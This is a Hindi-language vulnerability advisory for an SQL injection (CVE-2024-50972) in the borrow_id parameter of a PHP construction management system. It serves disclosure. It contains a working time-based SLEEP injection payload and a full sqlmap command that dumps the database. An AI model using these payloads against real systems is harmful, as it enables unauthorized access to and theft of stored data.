CVE-2024-50972
विवरण
Itsourcecode Construction Management System 1.0 के printtool.php में एक SQL injection कमजोरी है जो दूरस्थ हमलावरों को borrow_id पैरामीटर के माध्यम से मनमाने SQL कमांड निष्पादित करने की अनुमति देती है।
भेद्यता प्रकार
SQL Injection
उत्पाद का विक्रेता
Itsourcecode
प्रभावित उत्पाद कोड बेस:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
प्रभावित घटक:
Itsourcecode Construction Management System v1.0 printtool.php पेज पर borrow_id पैरामीटर के माध्यम से SQL injection के लिए संवेदनशील है।
हमले के वेक्टर:
- एप्लिकेशन को स्थानीय रूप से सेट अप करें, और admin:admin के रूप में व्यवस्थापक क्रेडेंशियल के साथ लॉग इन करें।
- अपने ब्राउज़र में निम्न URL पर जाएँ:
http://localhost/monitoring_system/printtool.php?borrow_id=5
- SQL पेलोड इंजेक्ट करें:
URL में borrow_id पैरामीटर को संशोधित करके समय-आधारित SQL injection पेलोड शामिल करें।
http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
- एप्लिकेशन प्रतिक्रिया का निरीक्षण करें:
यदि इंजेक्शन सफल होता है तो पेज को लोड होने में काफी अधिक समय (20 सेकंड) लगना चाहिए, जो पुष्टि करता है कि borrow_id पैरामीटर SQL injection के लिए संवेदनशील है।
- अब SQLMap टूल का उपयोग करके आगे शोषण और डेटाबेस डंप करने के लिए नीचे दिए गए कमांड का उपयोग करें:
sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
संदर्भ:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection